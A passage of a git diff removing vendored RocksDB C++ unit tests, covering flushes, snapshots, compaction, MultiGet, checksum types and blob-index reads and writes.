-    // universal compaction do not apply to the test case. Skip MergePut
-    // because single delete does not get removed when it encounters a merge.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-TEST_F(DBBasicTest, EmptyFlush) {
-  // It is possible to produce empty flushes when using single deletes. Tests
-  // whether empty flushes cause issues.
-  do {
-    Random rnd(301);
-
-    Options options = CurrentOptions();
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Put(1, "a", Slice());
-    SingleDelete(1, "a");
-    ASSERT_OK(Flush(1));
-
-    ASSERT_EQ("[ ]", AllEntriesFor("a", 1));
-    // Skip HashCuckooRep as it does not support single delete. FIFO and
-    // universal compaction do not apply to the test case. Skip MergePut
-    // because merges cannot be combined with single deletions.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-TEST_F(DBBasicTest, GetFromVersions) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("NOT_FOUND", Get(0, "foo"));
-  } while (ChangeOptions());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBBasicTest, GetSnapshot) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions(options_override));
-    // Try with both a short key and a long key
-    for (int i = 0; i < 2; i++) {
-      std::string key = (i == 0) ? std::string("foo") : std::string(200, 'x');
-      ASSERT_OK(Put(1, key, "v1"));
-      const Snapshot* s1 = db_->GetSnapshot();
-      if (option_config_ == kHashCuckoo) {
-        // Unsupported case.
-        ASSERT_TRUE(s1 == nullptr);
-        break;
-      }
-      ASSERT_OK(Put(1, key, "v2"));
-      ASSERT_EQ("v2", Get(1, key));
-      ASSERT_EQ("v1", Get(1, key, s1));
-      ASSERT_OK(Flush(1));
-      ASSERT_EQ("v2", Get(1, key));
-      ASSERT_EQ("v1", Get(1, key, s1));
-      db_->ReleaseSnapshot(s1);
-    }
-  } while (ChangeOptions());
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBBasicTest, CheckLock) {
-  do {
-    DB* localdb;
-    Options options = CurrentOptions();
-    ASSERT_OK(TryReopen(options));
-
-    // second open should fail
-    ASSERT_TRUE(!(DB::Open(options, dbname_, &localdb)).ok());
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, FlushMultipleMemtable) {
-  do {
-    Options options = CurrentOptions();
-    WriteOptions writeOpt = WriteOptions();
-    writeOpt.disableWAL = true;
-    options.max_write_buffer_number = 4;
-    options.min_write_buffer_number_to_merge = 3;
-    options.max_write_buffer_number_to_maintain = -1;
-    CreateAndReopenWithCF({"pikachu"}, options);
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v1"));
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v1"));
-
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v1", Get(1, "bar"));
-    ASSERT_OK(Flush(1));
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, FlushEmptyColumnFamily) {
-  // Block flush thread and disable compaction thread
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  test::SleepingBackgroundTask sleeping_task_high;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_high, Env::Priority::HIGH);
-
-  Options options = CurrentOptions();
-  // disable compaction
-  options.disable_auto_compactions = true;
-  WriteOptions writeOpt = WriteOptions();
-  writeOpt.disableWAL = true;
-  options.max_write_buffer_number = 2;
-  options.min_write_buffer_number_to_merge = 1;
-  options.max_write_buffer_number_to_maintain = 1;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Compaction can still go through even if no thread can flush the
-  // mem table.
-  ASSERT_OK(Flush(0));
-  ASSERT_OK(Flush(1));
-
-  // Insert can go through
-  ASSERT_OK(dbfull()->Put(writeOpt, handles_[0], "foo", "v1"));
-  ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v1"));
-
-  ASSERT_EQ("v1", Get(0, "foo"));
-  ASSERT_EQ("v1", Get(1, "bar"));
-
-  sleeping_task_high.WakeUp();
-  sleeping_task_high.WaitUntilDone();
-
-  // Flush can still go through.
-  ASSERT_OK(Flush(0));
-  ASSERT_OK(Flush(1));
-
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-}
-
-TEST_F(DBBasicTest, FLUSH) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    WriteOptions writeOpt = WriteOptions();
-    writeOpt.disableWAL = true;
-    SetPerfLevel(kEnableTime);
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v1"));
-    // this will now also flush the last 2 writes
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v1"));
-
-    get_perf_context()->Reset();
-    Get(1, "foo");
-    ASSERT_TRUE((int)get_perf_context()->get_from_output_files_time > 0);
-    ASSERT_EQ(2, (int)get_perf_context()->get_read_bytes);
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v1", Get(1, "bar"));
-
-    writeOpt.disableWAL = true;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v2"));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v2"));
-    ASSERT_OK(Flush(1));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v2", Get(1, "bar"));
-    get_perf_context()->Reset();
-    ASSERT_EQ("v2", Get(1, "foo"));
-    ASSERT_TRUE((int)get_perf_context()->get_from_output_files_time > 0);
-
-    writeOpt.disableWAL = false;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v3"));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v3"));
-    ASSERT_OK(Flush(1));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    // 'foo' should be there because its put
-    // has WAL enabled.
-    ASSERT_EQ("v3", Get(1, "foo"));
-    ASSERT_EQ("v3", Get(1, "bar"));
-
-    SetPerfLevel(kDisable);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, ManifestRollOver) {
-  do {
-    Options options;
-    options.max_manifest_file_size = 10;  // 10 bytes
-    options = CurrentOptions(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-    {
-      ASSERT_OK(Put(1, "manifest_key1", std::string(1000, '1')));
-      ASSERT_OK(Put(1, "manifest_key2", std::string(1000, '2')));
-      ASSERT_OK(Put(1, "manifest_key3", std::string(1000, '3')));
-      uint64_t manifest_before_flush = dbfull()->TEST_Current_Manifest_FileNo();
-      ASSERT_OK(Flush(1));  // This should trigger LogAndApply.
-      uint64_t manifest_after_flush = dbfull()->TEST_Current_Manifest_FileNo();
-      ASSERT_GT(manifest_after_flush, manifest_before_flush);
-      ReopenWithColumnFamilies({"default", "pikachu"}, options);
-      ASSERT_GT(dbfull()->TEST_Current_Manifest_FileNo(), manifest_after_flush);
-      // check if a new manifest file got inserted or not.
-      ASSERT_EQ(std::string(1000, '1'), Get(1, "manifest_key1"));
-      ASSERT_EQ(std::string(1000, '2'), Get(1, "manifest_key2"));
-      ASSERT_EQ(std::string(1000, '3'), Get(1, "manifest_key3"));
-    }
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, IdentityAcrossRestarts) {
-  do {
-    std::string id1;
-    ASSERT_OK(db_->GetDbIdentity(id1));
-
-    Options options = CurrentOptions();
-    Reopen(options);
-    std::string id2;
-    ASSERT_OK(db_->GetDbIdentity(id2));
-    // id1 should match id2 because identity was not regenerated
-    ASSERT_EQ(id1.compare(id2), 0);
-
-    std::string idfilename = IdentityFileName(dbname_);
-    ASSERT_OK(env_->DeleteFile(idfilename));
-    Reopen(options);
-    std::string id3;
-    ASSERT_OK(db_->GetDbIdentity(id3));
-    // id1 should NOT match id3 because identity was regenerated
-    ASSERT_NE(id1.compare(id3), 0);
-  } while (ChangeCompactOptions());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBBasicTest, Snapshot) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions(options_override));
-    Put(0, "foo", "0v1");
-    Put(1, "foo", "1v1");
-
-    const Snapshot* s1 = db_->GetSnapshot();
-    ASSERT_EQ(1U, GetNumSnapshots());
-    uint64_t time_snap1 = GetTimeOldestSnapshots();
-    ASSERT_GT(time_snap1, 0U);
-    Put(0, "foo", "0v2");
-    Put(1, "foo", "1v2");
-
-    env_->addon_time_.fetch_add(1);
-
-    const Snapshot* s2 = db_->GetSnapshot();
-    ASSERT_EQ(2U, GetNumSnapshots());
-    ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-    Put(0, "foo", "0v3");
-    Put(1, "foo", "1v3");
-
-    {
-      ManagedSnapshot s3(db_);
-      ASSERT_EQ(3U, GetNumSnapshots());
-      ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-
-      Put(0, "foo", "0v4");
-      Put(1, "foo", "1v4");
-      ASSERT_EQ("0v1", Get(0, "foo", s1));
-      ASSERT_EQ("1v1", Get(1, "foo", s1));
-      ASSERT_EQ("0v2", Get(0, "foo", s2));
-      ASSERT_EQ("1v2", Get(1, "foo", s2));
-      ASSERT_EQ("0v3", Get(0, "foo", s3.snapshot()));
-      ASSERT_EQ("1v3", Get(1, "foo", s3.snapshot()));
-      ASSERT_EQ("0v4", Get(0, "foo"));
-      ASSERT_EQ("1v4", Get(1, "foo"));
-    }
-
-    ASSERT_EQ(2U, GetNumSnapshots());
-    ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-    ASSERT_EQ("0v1", Get(0, "foo", s1));
-    ASSERT_EQ("1v1", Get(1, "foo", s1));
-    ASSERT_EQ("0v2", Get(0, "foo", s2));
-    ASSERT_EQ("1v2", Get(1, "foo", s2));
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-
-    db_->ReleaseSnapshot(s1);
-    ASSERT_EQ("0v2", Get(0, "foo", s2));
-    ASSERT_EQ("1v2", Get(1, "foo", s2));
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-    ASSERT_EQ(1U, GetNumSnapshots());
-    ASSERT_LT(time_snap1, GetTimeOldestSnapshots());
-
-    db_->ReleaseSnapshot(s2);
-    ASSERT_EQ(0U, GetNumSnapshots());
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-  } while (ChangeOptions(kSkipHashCuckoo));
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBBasicTest, CompactBetweenSnapshots) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    Options options = CurrentOptions(options_override);
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-    Random rnd(301);
-    FillLevels("a", "z", 1);
-
-    Put(1, "foo", "first");
-    const Snapshot* snapshot1 = db_->GetSnapshot();
-    Put(1, "foo", "second");
-    Put(1, "foo", "third");
-    Put(1, "foo", "fourth");
-    const Snapshot* snapshot2 = db_->GetSnapshot();
-    Put(1, "foo", "fifth");
-    Put(1, "foo", "sixth");
-
-    // All entries (including duplicates) exist
-    // before any compaction or flush is triggered.
-    ASSERT_EQ(AllEntriesFor("foo", 1),
-              "[ sixth, fifth, fourth, third, second, first ]");
-    ASSERT_EQ("sixth", Get(1, "foo"));
-    ASSERT_EQ("fourth", Get(1, "foo", snapshot2));
-    ASSERT_EQ("first", Get(1, "foo", snapshot1));
-
-    // After a flush, "second", "third" and "fifth" should
-    // be removed
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ sixth, fourth, first ]");
-
-    // after we release the snapshot1, only two values left
-    db_->ReleaseSnapshot(snapshot1);
-    FillLevels("a", "z", 1);
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-
-    // We have only one valid snapshot snapshot2. Since snapshot1 is
-    // not valid anymore, "first" should be removed by a compaction.
-    ASSERT_EQ("sixth", Get(1, "foo"));
-    ASSERT_EQ("fourth", Get(1, "foo", snapshot2));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ sixth, fourth ]");
-
-    // after we release the snapshot2, only one value should be left
-    db_->ReleaseSnapshot(snapshot2);
-    FillLevels("a", "z", 1);
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ("sixth", Get(1, "foo"));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ sixth ]");
-    // skip HashCuckooRep as it does not support snapshot
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction));
-}
-
-TEST_F(DBBasicTest, DBOpen_Options) {
-  Options options = CurrentOptions();
-  std::string dbname = test::TmpDir(env_) + "/db_options_test";
-  ASSERT_OK(DestroyDB(dbname, options));
-
-  // Does not exist, and create_if_missing == false: error
-  DB* db = nullptr;
-  options.create_if_missing = false;
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_TRUE(strstr(s.ToString().c_str(), "does not exist") != nullptr);
-  ASSERT_TRUE(db == nullptr);
-
-  // Does not exist, and create_if_missing == true: OK
-  options.create_if_missing = true;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-  ASSERT_TRUE(db != nullptr);
-
-  delete db;
-  db = nullptr;
-
-  // Does exist, and error_if_exists == true: error
-  options.create_if_missing = false;
-  options.error_if_exists = true;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_TRUE(strstr(s.ToString().c_str(), "exists") != nullptr);
-  ASSERT_TRUE(db == nullptr);
-
-  // Does exist, and error_if_exists == false: OK
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-  ASSERT_TRUE(db != nullptr);
-
-  delete db;
-  db = nullptr;
-}
-
-TEST_F(DBBasicTest, CompactOnFlush) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    Options options = CurrentOptions(options_override);
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Put(1, "foo", "v1");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v1 ]");
-
-    // Write two new keys
-    Put(1, "a", "begin");
-    Put(1, "z", "end");
-    Flush(1);
-
-    // Case1: Delete followed by a put
-    Delete(1, "foo");
-    Put(1, "foo", "v2");
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2, DEL, v1 ]");
-
-    // After the current memtable is flushed, the DEL should
-    // have been removed
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2, v1 ]");
-
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2 ]");
-
-    // Case 2: Delete followed by another delete
-    Delete(1, "foo");
-    Delete(1, "foo");
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, DEL, v2 ]");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, v2 ]");
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ ]");
-
-    // Case 3: Put followed by a delete
-    Put(1, "foo", "v3");
-    Delete(1, "foo");
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, v3 ]");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL ]");
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ ]");
-
-    // Case 4: Put followed by another Put
-    Put(1, "foo", "v4");
-    Put(1, "foo", "v5");
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v5, v4 ]");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v5 ]");
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v5 ]");
-
-    // clear database
-    Delete(1, "foo");
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ ]");
-
-    // Case 5: Put followed by snapshot followed by another Put
-    // Both puts should remain.
-    Put(1, "foo", "v6");
-    const Snapshot* snapshot = db_->GetSnapshot();
-    Put(1, "foo", "v7");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v7, v6 ]");
-    db_->ReleaseSnapshot(snapshot);
-
-    // clear database
-    Delete(1, "foo");
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ ]");
-
-    // Case 5: snapshot followed by a put followed by another Put
-    // Only the last put should remain.
-    const Snapshot* snapshot1 = db_->GetSnapshot();
-    Put(1, "foo", "v8");
-    Put(1, "foo", "v9");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v9 ]");
-    db_->ReleaseSnapshot(snapshot1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, FlushOneColumnFamily) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu", "ilya", "muromec", "dobrynia", "nikitich",
-                         "alyosha", "popovich"},
-                        options);
-
-  ASSERT_OK(Put(0, "Default", "Default"));
-  ASSERT_OK(Put(1, "pikachu", "pikachu"));
-  ASSERT_OK(Put(2, "ilya", "ilya"));
-  ASSERT_OK(Put(3, "muromec", "muromec"));
-  ASSERT_OK(Put(4, "dobrynia", "dobrynia"));
-  ASSERT_OK(Put(5, "nikitich", "nikitich"));
-  ASSERT_OK(Put(6, "alyosha", "alyosha"));
-  ASSERT_OK(Put(7, "popovich", "popovich"));
-
-  for (int i = 0; i < 8; ++i) {
-    Flush(i);
-    auto tables = ListTableFiles(env_, dbname_);
-    ASSERT_EQ(tables.size(), i + 1U);
-  }
-}
-
-TEST_F(DBBasicTest, MultiGetSimple) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    SetPerfLevel(kEnableCount);
-    ASSERT_OK(Put(1, "k1", "v1"));
-    ASSERT_OK(Put(1, "k2", "v2"));
-    ASSERT_OK(Put(1, "k3", "v3"));
-    ASSERT_OK(Put(1, "k4", "v4"));
-    ASSERT_OK(Delete(1, "k4"));
-    ASSERT_OK(Put(1, "k5", "v5"));
-    ASSERT_OK(Delete(1, "no_key"));
-
-    std::vector<Slice> keys({"k1", "k2", "k3", "k4", "k5", "no_key"});
-
-    std::vector<std::string> values(20, "Temporary data to be overwritten");
-    std::vector<ColumnFamilyHandle*> cfs(keys.size(), handles_[1]);
-
-    get_perf_context()->Reset();
-    std::vector<Status> s = db_->MultiGet(ReadOptions(), cfs, keys, &values);
-    ASSERT_EQ(values.size(), keys.size());
-    ASSERT_EQ(values[0], "v1");
-    ASSERT_EQ(values[1], "v2");
-    ASSERT_EQ(values[2], "v3");
-    ASSERT_EQ(values[4], "v5");
-    // four kv pairs * two bytes per value
-    ASSERT_EQ(8, (int)get_perf_context()->multiget_read_bytes);
-
-    ASSERT_OK(s[0]);
-    ASSERT_OK(s[1]);
-    ASSERT_OK(s[2]);
-    ASSERT_TRUE(s[3].IsNotFound());
-    ASSERT_OK(s[4]);
-    ASSERT_TRUE(s[5].IsNotFound());
-    SetPerfLevel(kDisable);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, MultiGetEmpty) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    // Empty Key Set
-    std::vector<Slice> keys;
-    std::vector<std::string> values;
-    std::vector<ColumnFamilyHandle*> cfs;
-    std::vector<Status> s = db_->MultiGet(ReadOptions(), cfs, keys, &values);
-    ASSERT_EQ(s.size(), 0U);
-
-    // Empty Database, Empty Key Set
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-    s = db_->MultiGet(ReadOptions(), cfs, keys, &values);
-    ASSERT_EQ(s.size(), 0U);
-
-    // Empty Database, Search for Keys
-    keys.resize(2);
-    keys[0] = "a";
-    keys[1] = "b";
-    cfs.push_back(handles_[0]);
-    cfs.push_back(handles_[1]);
-    s = db_->MultiGet(ReadOptions(), cfs, keys, &values);
-    ASSERT_EQ(static_cast<int>(s.size()), 2);
-    ASSERT_TRUE(s[0].IsNotFound() && s[1].IsNotFound());
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, ChecksumTest) {
-  BlockBasedTableOptions table_options;
-  Options options = CurrentOptions();
-  // change when new checksum type added
-  int max_checksum = static_cast<int>(kxxHash);
-  const int kNumPerFile = 2;
-
-  // generate one table with each type of checksum
-  for (int i = 0; i <= max_checksum; ++i) {
-    table_options.checksum = static_cast<ChecksumType>(i);
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    Reopen(options);
-    for (int j = 0; j < kNumPerFile; ++j) {
-      ASSERT_OK(Put(Key(i * kNumPerFile + j), Key(i * kNumPerFile + j)));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  // verify data with each type of checksum
-  for (int i = 0; i <= kxxHash; ++i) {
-    table_options.checksum = static_cast<ChecksumType>(i);
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    Reopen(options);
-    for (int j = 0; j < (max_checksum + 1) * kNumPerFile; ++j) {
-      ASSERT_EQ(Key(j), Get(Key(j)));
-    }
-  }
-}
-
-// On Windows you can have either memory mapped file or a file
-// with unbuffered access. So this asserts and does not make
-// sense to run
-#ifndef OS_WIN
-TEST_F(DBBasicTest, MmapAndBufferOptions) {
-  if (!IsMemoryMappedAccessSupported()) {
-    return;
-  }
-  Options options = CurrentOptions();
-
-  options.use_direct_reads = true;
-  options.allow_mmap_reads = true;
-  ASSERT_NOK(TryReopen(options));
-
-  // All other combinations are acceptable
-  options.use_direct_reads = false;
-  ASSERT_OK(TryReopen(options));
-
-  if (IsDirectIOSupported()) {
-    options.use_direct_reads = true;
-    options.allow_mmap_reads = false;
-    ASSERT_OK(TryReopen(options));
-  }
-
-  options.use_direct_reads = false;
-  ASSERT_OK(TryReopen(options));
-}
-#endif
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_blob_index_test.cc b/thirdparty/rocksdb/db/db_blob_index_test.cc
deleted file mode 100644
index e71b511..0000000
--- a/thirdparty/rocksdb/db/db_blob_index_test.cc
+++ /dev/null
@@ -1,409 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <functional>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/db_iter.h"
-#include "db/db_test_util.h"
-#include "db/dbformat.h"
-#include "db/write_batch_internal.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "util/string_util.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-// kTypeBlobIndex is a value type used by BlobDB only. The base rocksdb
-// should accept the value type on write, and report not supported value
-// for reads, unless caller request for it explicitly. The base rocksdb
-// doesn't understand format of actual blob index (the value).
-class DBBlobIndexTest : public DBTestBase {
- public:
-  enum Tier {
-    kMemtable = 0,
-    kImmutableMemtables = 1,
-    kL0SstFile = 2,
-    kLnSstFile = 3,
-  };
-  const std::vector<Tier> kAllTiers = {Tier::kMemtable,
-                                       Tier::kImmutableMemtables,
-                                       Tier::kL0SstFile, Tier::kLnSstFile};
-
-  DBBlobIndexTest() : DBTestBase("/db_blob_index_test") {}
-
-  ColumnFamilyHandle* cfh() { return dbfull()->DefaultColumnFamily(); }
-
-  ColumnFamilyData* cfd() {
-    return reinterpret_cast<ColumnFamilyHandleImpl*>(cfh())->cfd();
-  }
-
-  Status PutBlobIndex(WriteBatch* batch, const Slice& key,
-                      const Slice& blob_index) {
-    return WriteBatchInternal::PutBlobIndex(batch, cfd()->GetID(), key,
-                                            blob_index);
-  }
-
-  Status Write(WriteBatch* batch) {
-    return dbfull()->Write(WriteOptions(), batch);
-  }
-
-  std::string GetImpl(const Slice& key, bool* is_blob_index = nullptr,
-                      const Snapshot* snapshot = nullptr) {
-    ReadOptions read_options;
-    read_options.snapshot = snapshot;
-    PinnableSlice value;
-    auto s = dbfull()->GetImpl(read_options, cfh(), key, &value,
-                               nullptr /*value_found*/, is_blob_index);
-    if (s.IsNotFound()) {
-      return "NOT_FOUND";
-    }
-    if (s.IsNotSupported()) {
-      return "NOT_SUPPORTED";
-    }
-    if (!s.ok()) {
-      return s.ToString();
-    }
-    return value.ToString();
-  }
-
-  std::string GetBlobIndex(const Slice& key,
-                           const Snapshot* snapshot = nullptr) {
-    bool is_blob_index = false;
-    std::string value = GetImpl(key, &is_blob_index, snapshot);
-    if (!is_blob_index) {
-      return "NOT_BLOB";
-    }
-    return value;
-  }
-
-  ArenaWrappedDBIter* GetBlobIterator() {
-    return dbfull()->NewIteratorImpl(ReadOptions(), cfd(),
-                                     dbfull()->GetLatestSequenceNumber(),
-                                     true /*allow_blob*/);
-  }
-
-  Options GetTestOptions() {
-    Options options;
-    options.create_if_missing = true;
-    options.num_levels = 2;
-    options.disable_auto_compactions = true;
-    // Disable auto flushes.
-    options.max_write_buffer_number = 10;
-    options.min_write_buffer_number_to_merge = 10;
-    options.merge_operator = MergeOperators::CreateStringAppendOperator();
-    return options;
-  }
-
-  void MoveDataTo(Tier tier) {
-    switch (tier) {
-      case Tier::kMemtable:
-        break;
-      case Tier::kImmutableMemtables:
-        ASSERT_OK(dbfull()->TEST_SwitchMemtable());
-        break;
-      case Tier::kL0SstFile:
-        ASSERT_OK(Flush());
-        break;
-      case Tier::kLnSstFile:
-        ASSERT_OK(Flush());
-        ASSERT_OK(Put("a", "dummy"));
-        ASSERT_OK(Put("z", "dummy"));
-        ASSERT_OK(Flush());
-        ASSERT_OK(
-            dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-#ifndef ROCKSDB_LITE
-        ASSERT_EQ("0,1", FilesPerLevel());
-#endif  // !ROCKSDB_LITE
-        break;
-    }
-  }
-};
-
-// Should be able to write kTypeBlobIndex to memtables and SST files.
-TEST_F(DBBlobIndexTest, Write) {
-  for (auto tier : kAllTiers) {
-    DestroyAndReopen(GetTestOptions());
-    for (int i = 1; i <= 5; i++) {
-      std::string index = ToString(i);
-      WriteBatch batch;
-      ASSERT_OK(PutBlobIndex(&batch, "key" + index, "blob" + index));
-      ASSERT_OK(Write(&batch));
-    }
-    MoveDataTo(tier);
-    for (int i = 1; i <= 5; i++) {
-      std::string index = ToString(i);
-      ASSERT_EQ("blob" + index, GetBlobIndex("key" + index));
-    }
-  }
-}
-
-// Get should be able to return blob index if is_blob_index is provided,
-// otherwise return Status::NotSupported status.
-TEST_F(DBBlobIndexTest, Get) {
-  for (auto tier : kAllTiers) {
-    DestroyAndReopen(GetTestOptions());
-    WriteBatch batch;
-    ASSERT_OK(batch.Put("key", "value"));
-    ASSERT_OK(PutBlobIndex(&batch, "blob_key", "blob_index"));
-    ASSERT_OK(Write(&batch));
-    MoveDataTo(tier);
-    // Verify normal value
-    bool is_blob_index = false;
-    PinnableSlice value;
-    ASSERT_EQ("value", Get("key"));
-    ASSERT_EQ("value", GetImpl("key"));
-    ASSERT_EQ("value", GetImpl("key", &is_blob_index));
-    ASSERT_FALSE(is_blob_index);
-    // Verify blob index
-    ASSERT_TRUE(Get("blob_key", &value).IsNotSupported());
-    ASSERT_EQ("NOT_SUPPORTED", GetImpl("blob_key"));
-    ASSERT_EQ("blob_index", GetImpl("blob_key", &is_blob_index));
-    ASSERT_TRUE(is_blob_index);
-  }
-}
-
-// Get should NOT return Status::NotSupported if blob index is updated with
-// a normal value.
-TEST_F(DBBlobIndexTest, Updated) {
-  for (auto tier : kAllTiers) {
-    DestroyAndReopen(GetTestOptions());
-    WriteBatch batch;
-    for (int i = 0; i < 10; i++) {
